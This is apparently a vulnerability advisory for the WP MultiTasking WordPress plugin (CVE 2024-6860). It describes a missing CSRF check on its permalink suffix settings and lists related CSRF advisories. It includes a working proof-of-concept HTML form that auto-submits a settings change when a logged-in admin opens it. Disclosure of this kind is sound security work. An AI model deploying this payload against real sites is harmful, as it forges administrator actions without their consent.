WP MultiTasking <= 0.1.12 – Permalink Suffix Update via CSRF | CVE 2024-6860 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when updating its permalink suffix settings, which could allow attackers to make logged admins perform such action via a CSRF attack

Proof of Concept

Make a logged in admin open an HTML file containing:

```
<form id="csrfForm" action="https://example.com/wp-admin/admin.php?page=wpmt_permalinks" method="post">
<input type="hidden" name="uwt_submit_hidden" value="Y">
<input type="hidden" name="uwt_permalink_customtype_suffix" value="hacked">
<input type="hidden" name="Submit" value="save">
</form>
<script>
document.getElementById('csrfForm').submit();
</script>
```

Affects Plugins

wp-multitasking

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Norbert Hofmann

Submitter

Norbert Hofmann

Submitter website

https://www.linkedin.com/in/norbert-hofmann-53761417/

Verified

Yes

WPVDB ID

1d09d3dd-aa49-4ff1-80e7-6d176e378916

Timeline

Publicly Published

2025-03-19 (about 9 months ago)

Added

2025-03-19 (about 9 months ago)

Last Updated

2025-03-19 (about 9 months ago)

Other

Published

Title

Published

2025-04-09

Title

Social Bookmarking RELOADED <= 3.18 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-11-10

Title

YSlider <= 1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-09-05

Title

MSTW League Manager <= 2.10 - Cross-Site Request Forgery

Published

2023-09-11

Title

WooCommerce Subscription < 4.6.0 - Cross-Site Request Forgery

Published

2024-02-07

Title

ImageRecycle pdf & image compression < 3.1.14 - Cross-Site Request Forgery to Settings Update in disableOptimization